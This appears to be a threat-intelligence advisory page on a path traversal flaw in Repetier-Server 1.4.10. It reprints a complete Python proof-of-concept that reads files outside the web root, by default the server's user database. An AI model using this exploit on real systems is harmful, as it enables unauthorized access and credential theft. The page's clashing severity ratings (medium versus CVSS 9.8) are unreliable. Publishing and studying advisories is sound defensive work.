Repetier-Server 1.4.10 - Path Traversal
Repetier-Server version 1. 4. 10 is affected by a path traversal vulnerability that allows an attacker to access files outside the intended directory. This vulnerability is classified as medium severity. Exploit code is publicly available in Python, but there are no known exploits observed in the wild. No patch or official remediation information is currently provided.
AI Analysis
Technical Summary
The Repetier-Server 1.4.10 application contains a path traversal vulnerability. This type of vulnerability enables an attacker to manipulate file paths to access files and directories outside the intended scope, potentially exposing sensitive information or system files. The exploit code is available in Python, indicating a proof-of-concept or working exploit exists. No affected versions beyond 1.4.10 are specified, and no vendor advisory or patch information is provided.
Potential Impact
Successful exploitation could allow unauthorized reading of arbitrary files on the server hosting Repetier-Server 1.4.10. This may lead to information disclosure but does not explicitly indicate further impact such as code execution or privilege escalation. No active exploitation in the wild has been reported.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until a patch or official fix is available, restrict access to the Repetier-Server interface to trusted users and networks to reduce exposure. Monitor vendor communications for updates on remediation.
Indicators of Compromise
- exploit-code: # Exploit Title: Repetier-Server 1.4.10 - Path Traversal # Exploit Author: Mohammed Idrees Banyamer # Vendor Homepage: https://www.repetier.com/ # Version: <= 1.4.10 # Tested on: Windows 10 / Windows Server 2019 (Repetier-Server default install) # CVE: CVE-2026-26335 # Advisory: https://cybir.com/2023/cve/poc-repetier-server-140/ (related research) # CVSS: 9.8 (Critical) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N import requests import argparse import sys from urllib.parse import urljoin def generate_traversal(depth: int = 15) -> str: return "..%5c" * depth def attempt_read(target_url: str, file_path: str, traversal_depth: int = 15, timeout: int = 10) -> bool: traversal = generate_traversal(traversal_depth) payloads = [ f"views{traversal}{file_path}/base/connectionLost.php", f"base/connectionLost.php?file={traversal}{file_path}", ] print(f"[*] Targeting: {target_url}") print(f"[*] Attempting to read: {file_path}") print(f"[*] Traversal depth: {traversal_depth}") for payload in payloads: exploit_url = urljoin(target_url.rstrip("/") + "/", payload) try: print(f" → Trying: {exploit_url}") r = requests.get(exploit_url, timeout=timeout, verify=False) if r.status_code == 200 and len(r.content) > 60: sample = r.text[:500].replace("\n", " ").strip() print(f"[+] LIKELY SUCCESS (status {r.status_code}, {len(r.content)} bytes)") print(f" Preview:\n {sample}...") return True else: print(f" → Failed (status {r.status_code}, size {len(r.content)})") except requests.RequestException as e: print(f" → Error: {e}") return False def main(): parser = argparse.ArgumentParser( description="CVE-2026-26335 PoC - Repetier-Server Path Traversal / LFI" ) parser.add_argument("target", help="Target base URL (e.g. http://192.168.1.100:3344/)") parser.add_argument("--file", default="ProgramData\\Repetier-Server\\database\\user.sql", help="File path to read (use Windows \\ separator)") parser.add_argument("--depth", type=int, default=15, help="Traversal depth") parser.add_argument("--test", action="store_true", help="Quick test with Windows\\win.ini") args = parser.parse_args() if args.test: args.file = "Windows\\win.ini" print("[i] Running test mode → targeting Windows\\win.ini") file_path = args.file.replace("\\", "%5c") print("=" * 70) print("CVE-2026-26335 Exploit PoC - Repetier-Server <=1.4.10 Path Traversal") print("USE ONLY ON SYSTEMS YOU OWN OR HAVE EXPLICIT PERMISSION TO TEST!") print("=" * 70, "\n") success = attempt_read(args.target, file_path, args.depth) if not success: print("\n[!] Exploitation attempt failed.") print("Suggestions:") print(" • Increase --depth (try 18–30)") print(" • Verify target is running Repetier-Server <=1.4.10") print(" • Try alternative interesting files:") print(" - ProgramData%5cRepetier-Server%5cconfig.xml") print(" - Windows%5csystem32%5cdrivers%5cetc%5chosts") if __name__ == "__main__": main()
Repetier-Server 1.4.10 - Path Traversal
Description
Repetier-Server version 1. 4. 10 is affected by a path traversal vulnerability that allows an attacker to access files outside the intended directory. This vulnerability is classified as medium severity. Exploit code is publicly available in Python, but there are no known exploits observed in the wild. No patch or official remediation information is currently provided.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The Repetier-Server 1.4.10 application contains a path traversal vulnerability. This type of vulnerability enables an attacker to manipulate file paths to access files and directories outside the intended scope, potentially exposing sensitive information or system files. The exploit code is available in Python, indicating a proof-of-concept or working exploit exists. No affected versions beyond 1.4.10 are specified, and no vendor advisory or patch information is provided.
Potential Impact
Successful exploitation could allow unauthorized reading of arbitrary files on the server hosting Repetier-Server 1.4.10. This may lead to information disclosure but does not explicitly indicate further impact such as code execution or privilege escalation. No active exploitation in the wild has been reported.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until a patch or official fix is available, restrict access to the Repetier-Server interface to trusted users and networks to reduce exposure. Monitor vendor communications for updates on remediation.
Technical Details
- Edb Id
- 52540
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Repetier-Server 1.4.10 - Path Traversal
# Exploit Title: Repetier-Server 1.4.10 - Path Traversal # Exploit Author: Mohammed Idrees Banyamer # Vendor Homepage: https://www.repetier.com/ # Version: <= 1.4.10 # Tested on: Windows 10 / Windows Server 2019 (Repetier-Server default install) # CVE: CVE-2026-26335 # Advisory: https://cybir.com/2023/cve/poc-repetier-server-140/ (related research) # CVSS: 9.8 (Critical) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N import requests import argparse... (2834 more characters)
Threat ID: 69f5140dcbff5d86105a4029
Added to database: 5/1/2026, 8:58:53 PM
Last enriched: 5/1/2026, 8:59:12 PM
Last updated: 5/2/2026, 5:49:57 AM
Views: 5
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.